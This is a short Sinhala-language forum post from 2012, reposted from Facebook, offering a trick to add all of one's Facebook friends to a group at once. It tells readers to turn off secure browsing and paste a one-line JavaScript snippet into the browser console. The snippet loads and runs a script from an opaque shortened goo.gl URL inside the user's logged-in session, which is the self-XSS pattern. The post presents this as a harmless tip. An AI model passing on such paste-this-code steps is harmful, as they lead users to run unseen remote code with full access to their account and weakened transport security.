Facebook Group එකකට මිතුරන් එකතු කිරීම සරලව !!!

SithumC

Member
Apr 2, 2009
9
1
0
Kandy
Facebook Group එකකට මිතුරන් එකතු කිරීම සරලව !!!

556481_4415680479713_1785505859_n.jpg


Facebook Group එකකට සියලුම මිතුරන් එකවර එකතු කිරීම.

ඔබ දන්නවා facebook group එකකට සාමාජිකයන් එකතු කල යුතු නම් එකින් එක නම් ඇතුලත් කරමින් මිතුරන් එකතු කල යුතුය :angry:. මේ එම කාර්යය වෙහෙසකින් තොරව වඩාත් ඉක්මනින් හා පහසුවෙන් කරගත හැකි එකම ක්‍රමයයි :rolleyes:

1. පහත code එක copy කරගන්න.


Code:
document.body.appendChild(document.createElement('script')).src='http://goo.gl/e5rEi';


2. Account setting > Security > Secure browsing off කරන්න.


3. මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.


4. Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කර
Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console" තෝරන්න


5. කලින් copy කරගත් code එක එතන ඇති code ඇතුලත් කල හැකි ස්ථානයේ paste කර Enter key ඇතුලත් කරන්න.


6. ඔබගේ browser එකේ එම tab එක තුල මෙය run වීමට ඉඩ හැර වෙනත් tab එකක ඔබගේ වැඩ කරගෙන යන්න. සියලු දෙනා එකතු වී අවසන් වන තුරු එම tab එක close කරගන්න එපා :yes:


04.09.2012 | Sithum Jayarathna
originally posted on facebook fb.me/sithumc
 
Last edited: